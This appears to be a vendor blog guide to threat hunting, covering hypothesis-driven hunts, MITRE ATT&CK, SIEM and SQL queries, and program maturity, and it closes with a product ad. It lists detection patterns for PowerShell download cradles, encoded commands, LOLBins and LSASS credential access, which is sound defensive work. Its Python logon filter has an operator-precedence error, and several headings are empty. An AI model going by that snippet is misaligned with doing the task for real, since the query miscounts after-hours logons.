The Shift from Reactive to Proactive
Traditional security assumes your defenses will block most threats. Threat hunting assumes adversaries are already in your network and actively searches for them.
What is Threat Hunting?
**Definition:** The proactive and iterative process of searching for cyber threats that evade existing security solutions.
Key Principles:
The Threat Hunting Loop
1. Hypothesis Generation
Sources of Hypotheses:
Example Hypotheses:
2. Data Collection
Required Data Sources:
Endpoint Data:
Network Data:
Authentication Logs:
3. Investigation
Analysis Techniques:
Statistical Analysis:
Pattern Matching:
4. Response & Documentation
Actions:
MITRE ATT&CK Framework
Using ATT&CK for Hunting
Tactic-Based Approach:
Initial Access:
Execution:
Persistence:
Privilege Escalation:
Hunt ing Methodologies
1. Intel-Driven Hunting
Process:
5. Create detections
**Example:** APT group known to use specific PowerShell patterns.
2. Hypothesis-Driven Hunting
Process:
**Example:** "Attackers are using WMI for lateral movement"
3. Baseline Anomaly Hunting
Process:
**Example:** Process creating unusual network connections
Hunting Queries
PowerShell Analysis
Suspicious PowerShell Patterns:
# Base64 encoding usage
*-EncodedCommand*
*FromBase64String*
# Download cradles
*IEX*
*Invoke-Expression*
*Net.WebClient*
*DownloadString*
# Obfuscation indicators
*-Join*
*Replace*
*Split*
Lateral Movement Detection
SMB Analysis:
SELECT
src_ip,
dst_ip,
COUNT(*) as connection_count,
COUNT(DISTINCT dst_ip) as unique_targets
FROM network_connections
WHERE dst_port = 445
AND src_ip IN (internal_ips)
GROUP BY src_ip
HAVING unique_targets > 10
Credential Access
LSASS Memory Access:
Process accessing LSASS memory
Source: Non-system processes
Filter: Not in whitelist (AV, EDR)
Action: Alert + investigate
Tools for Threat Hunting
EDR Platforms
Query historical endpoint data Process tree visualization File reputation checking Network connection tracking
SIEM Analysis
Splunk Queries:
# Find rare processes with network activity
index=endpoint sourcetype=process
| stats count by process_name, dest_ip
| where count < 5
Elastic Query:
{
"query": {
"bool": {
"must": [
{"match": {"event.action": "process_creation"}},
{"regexp": {"process.command_line": ".*powershell.*-enc.*"}}
]
}
}
}
Custom Scripts
Python for Log Analysis:
import pandas as pd
# Load Windows event logs
df = pd.read_csv('security_logs.csv')
# Find suspicious logon times
suspicious = df[
(df['event_id'] == 4624) &
(df['hour'] >= 22) | (df['hour'] <= 6)
]
print(f"After-hours logons: {len(suspicious)}")
Hunt Scenarios
Scenario 1: Living Off the Land
**Hypothesis:** Attackers using built-in Windows tools
Hunt:
Search for unusual parent-child relationships Look for LOLBins (certutil, bitsadmin, etc.) Check for execution from unusual locations Analyze command-line parameters
Scenario 2: Data Exfiltration
**Hypothesis:** Large volumes of data leaving network
Hunt:
Analyze outbound traffic volumes Identify unusual upload patterns Check DNS query volumes Investigate cloud storage uploads
Scenario 3: Account Compromise
**Hypothesis:** Credentials being used from unusual locations
Hunt:
Baseline normal login patterns Detect geographically impossible travel Identify after-hours access Check for simultaneous logins
Hunting Maturity Levels
Level 0: Initial
No formal hunting program Reactive only
Level 1: Minimal
Ad-hoc hunting Limited data sources Manual processes
Level 2: Procedural
Documented procedures Regular hunting cadence Multiple data sources
Level 3: Innovative
Automated hunting workflows Custom analytics Integration with threat intel
Level 4: Leading
Continuous hunting ML-assisted analysis Proactive threat modeling
Building a Hunting Program
Phase 1: Foundation (Months 1-3)
**Data Collection** - Enable logging
- Centralize in SIEM
- Ensure retention
**Baseline Establishment** - Normal user behavior
- Common processes
- Network patterns
**Tool Selection** - EDR platform
- SIEM solution
- Analysis tools
Phase 2: Operationalization (Months 4-6)
**Create Playbooks** - Document hunt procedures
- Define success criteria
- Establish metrics
**Schedule Hunts** - Weekly tactical hunts
- Monthly strategic hunts
- Quarterly deep dives
**Train Team** - TTP familiarization
- Tool proficiency
- Analysis techniques
Phase 3: Maturity (Months 7-12)
**Automation** - Automated data collection
- Scripted queries
- Alert orchestration
**Metrics** - Hunts conducted
- Threats found
- Time to detection
**Improvement** - Playbook refinement
- Detection rule creation
- Process optimization
Success Metrics
Hunt Metrics:
Hunts conducted per month Average hunt duration Hypotheses tested
Detection Metrics:
Threats discovered Mean time to detection False positive rate
Program Metrics:
Coverage of ATT&CK techniques Data source completeness Team capability growth
Experience advanced threat hunting with Nerou SIEM - AI-powered analytics for proactive threat detection.